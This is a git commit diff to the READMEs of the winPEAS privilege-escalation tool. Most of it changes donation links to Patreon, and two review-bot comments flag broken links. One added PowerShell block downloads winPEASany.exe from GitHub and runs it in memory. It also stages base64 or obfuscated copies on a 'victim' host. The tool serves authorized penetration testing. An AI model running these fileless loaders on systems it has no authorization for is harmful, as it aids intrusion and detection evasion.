winPEASv2
parent 1f3d067ab2
commit f2b66bc711
2
.github/FUNDING.yml
vendored
@ -1 +1 @@
|
||||
custom: ['https://www.buymeacoffee.com/carlospolop']
|
||||
custom: ['https://www.patreon.com/peass']
|
||||
|
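Review bot: the replacement `custom:` entry keeps the Patreon page as a free-form URL, although GitHub's FUNDING.yml has a dedicated `patreon:` key that takes the account name. Using `patreon: peass` would list it as a Patreon entry rather than a generic custom link; if `custom:` is intentional, a one-line comment saying so would help.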
@ -22,7 +22,7 @@ If you want to **add something** and have **any cool idea** related to this proj
|
||||
|
||||
## Please, if this tool has been useful for you consider to donate
|
||||
|
||||
[](https://www.buymeacoffee.com/carlospolop)
|
||||
[](https://www.patreon.com/peass)
|
||||
|
||||
## Looking for a useful Privilege Escalation Course?
|
||||
|
||||
|
@ -295,7 +295,7 @@ If you want to **add something** and have **any cool idea** related to this proj
|
||||
|
||||
## Please, if this tool has been useful for you consider to donate
|
||||
|
||||
[](https://www.buymeacoffee.com/carlospolop)
|
||||
[](https://www.patreon.com/peass)
|
||||
|
||||
## Looking for a useful Privilege Escalation Course?
|
||||
|
||||
|
@ -16,7 +16,7 @@ If you want to **add something** and have **any cool idea** related to this proj
|
||||
|
||||
## Please, if this tool has been useful for you consider to donate
|
||||
|
||||
[](https://www.paypal.com/cgi-bin/webscr?cmd=_s-xclick&hosted_button_id=DED2HWDYLFT2C&source=url)
|
||||
[](https://www.patreon.com/peass)
|
||||
|
||||
## Looking for a useful Privilege Escalation Course?
|
||||
|
||||
|
@ -129,6 +129,10 @@ This is the kind of outpuf that you have to look for when usnig the winPEAS.bat
|
||||
|
||||
[More info about icacls here](https://ss64.com/nt/icacls.html)
|
||||
|
||||
## Please, if this tool has been useful for you consider to donate
|
||||
|
||||
[](https://www.patreon.com/peass)
|
||||
|
||||
## Let's improve PEASS together
|
||||
|
||||
If you want to **add something** and have **any cool idea** related to this project, please let me know it in the **telegram group https://t.me/peass** or using **[github issues](https://github.com/carlospolop/privilege-escalation-awesome-scripts-suite/issues)** and we will update the master version.
|
||||
|
@ -12,7 +12,47 @@ Check also the **Local Windows Privilege Escalation checklist** from **[book.hac
|
||||
|
||||
**.Net >= 4.5 is required**
|
||||
|
||||
Download the **[latest obfuscated version from here](https://github.com/carlospolop/privilege-escalation-awesome-scripts-suite/tree/master/winPEAS/winPEASexe/winPEAS/bin/Obfuscated%20Releases)** or **compile it yourself** (read instructions for compilation).
|
||||
Precompiled binaries:
|
||||
- Download the **[latest obfuscated version from here](https://github.com/carlospolop/privilege-escalation-awesome-scripts-suite/tree/master/winPEAS/winPEASexe/winPEAS/binanries/Obfuscated%20Releases)** or **compile it yourself** (read instructions for compilation).
|
||||
- Non-Obfuscated [winPEASany.exe](https://github.com/carlospolop/privilege-escalation-awesome-scripts-suite/blob/master/winPEAS/winPEASexe/binaries/Release/winPEASany.exe)
|
||||
- Non-Obfuscated [winPEASx64.exe](https://github.com/carlospolop/privilege-escalation-awesome-scripts-suite/blob/master/winPEAS/winPEASexe/binaries/x64/Release/winPEASx64.exe)
|
||||
- Non-Obfuscated [winPEASx86.exe](https://github.com/carlospolop/privilege-escalation-awesome-scripts-suite/tree/master/winPEAS/winPEASexe/binaries/x86/Release/winPEASx86.exe)
|
||||
|
||||
```bash
|
||||
#One liner to download and execute winPEASany from memory in a PS shell
|
||||
$wp=[System.Reflection.Assembly]::Load([byte[]](Invoke-WebRequest "https://github.com/carlospolop/privilege-escalation-awesome-scripts-suite/raw/master/winPEAS/winPEASexe/binaries/Release/winPEASany.exe" -UseBasicParsing | Select-Object -ExpandProperty Content)); [winPEAS.Program]::Main("")
|
||||
|
||||
#Before cmd in 3 lines
|
||||
$url = "https://github.com/carlospolop/privilege-escalation-awesome-scripts-suite/raw/master/winPEAS/winPEASexe/binaries/Release/winPEASany.exe"
|
||||
$wp=[System.Reflection.Assembly]::Load([byte[]](Invoke-WebRequest "$url" -UseBasicParsing | Select-Object -ExpandProperty Content));
|
||||
[winPEAS.Program]::Main("") #Put inside the quotes the winpeas parameters you want to use
|
||||
|
||||
#Load from disk in memory and execute:
|
||||
$wp = [System.Reflection.Assembly]::Load([byte[]]([IO.File]::ReadAllBytes("D:\Users\victim\winPEAS.exe")));
|
||||
[winPEAS.Program]::Main("") #Put inside the quotes the winpeas parameters you want to use
|
||||
|
||||
#Load from disk in base64 and execute
|
||||
##Generate winpeas in Base64:
|
||||
[Convert]::ToBase64String([IO.File]::ReadAllBytes("D:\Users\user\winPEAS.exe")) | Out-File -Encoding ASCII D:\Users\user\winPEAS.txt
|
||||
##Now upload the B64 string to the victim inside a file or copy it to the clipboard
|
||||
|
||||
##If you have uploaded the B64 as afile load it with:
|
||||
$thecontent = Get-Content -Path D:\Users\victim\winPEAS.txt
|
||||
##If you have copied the B64 to the clipboard do:
|
||||
$thecontent = "aaaaaaaa..." #Where "aaa..." is the winpeas base64 string
|
||||
##Finally, load binary in memory and execute
|
||||
$wp = [System.Reflection.Assembly]::Load([Convert]::FromBase64String($thecontent))
|
||||
[winPEAS.Program]::Main("") #Put inside the quotes the winpeas parameters you want to use
|
||||
|
||||
#Loading from file and executing a winpeas obfuscated version
|
||||
##Load obfuscated version
|
||||
$wp = [System.Reflection.Assembly]::Load([byte[]]([IO.File]::ReadAllBytes("D:\Users\victim\winPEAS-Obfuscated.exe")));
|
||||
$wp.EntryPoint #Get the name of the ReflectedType, in obfuscated versions sometimes this is different from "winPEAS.Program"
|
||||
[<ReflectedType_from_before>]::Main("") #Used the ReflectedType name to execute winpeas
|
||||
```
|
||||
|
||||
## Parameters
|
||||
|
||||
```bash
|
||||
winpeas.exe #run all checks (except for additional slower checks - LOLBAS and linpeas.sh in WSL) (noisy - CTFs)
|
||||
winpeas.exe systeminfo userinfo #Only systeminfo and userinfo checks executed
|
||||
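Review bot: in the "Precompiled binaries" list, the obfuscated-release link points at `winPEAS/winPEASexe/winPEAS/binanries/Obfuscated%20Releases`, while the three non-obfuscated links use `winPEAS/winPEASexe/binaries/...`; "binanries" looks like a typo and the extra `winPEAS/` segment looks stale, so this link is likely dead. The x86 link also uses `/tree/` for a file where the other two use `/blob/`. The fence is tagged `bash` but its content is PowerShell, so `powershell` is the right tag, and "afile" should be "a file". Both download examples pull `winPEASany.exe` from `raw/master` and pass the bytes straight to `Assembly::Load`; pinning the URL to a release tag or commit and publishing a SHA-256 next to the links would let users confirm what they are loading.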
@ -20,7 +60,8 @@ winpeas.exe notcolor #Do not color the output
|
||||
winpeas.exe wait #wait for user input between tests
|
||||
winpeas.exe debug #display additional debug information
|
||||
winpeas.exe log #log output to out.txt instead of standard output
|
||||
winpeas.exe -lolbas -linpeas=http://127.0.0.1/linpeas.sh #execute also additional LOLBAS search check and linpeas check (runs linpeas.sh in default WSL distribution) with custom linpeas.sh URL (if not provided, the default URL is: https://raw.githubusercontent.com/carlospolop/privilege-escalation-awesome-scripts-suite/master/linPEAS/linpeas.sh)
|
||||
winpeas.exe -linpeas=http://127.0.0.1/linpeas.sh #Execute also additional linpeas check (runs linpeas.sh in default WSL distribution) with custom linpeas.sh URL (if not provided, the default URL is: https://raw.githubusercontent.com/carlospolop/privilege-escalation-awesome-scripts-suite/master/linPEAS/linpeas.sh)
|
||||
winpeas.exe -lolbas #Execute also additional LOLBAS search check
|
||||
```
|
||||
|
||||
## Basic information
|
||||
@ -216,6 +257,10 @@ If you find any issue, please report it using **[github issues](https://github.c
|
||||
|
||||
**WinPEAS** is being **updated** every time I find something that could be useful to escalate privileges.
|
||||
|
||||
## Please, if this tool has been useful for you consider to donate
|
||||
|
||||
[](https://www.patreon.com/peass)
|
||||
|
||||
## Advisory
|
||||
|
||||
All the scripts/binaries of the PEAS Suite should be used for authorized penetration testing and/or educational purposes only. Any misuse of this software will not be the responsibility of the author or of any other collaborator. Use it at your own networks and/or with the network owner's permission.
|
||||
|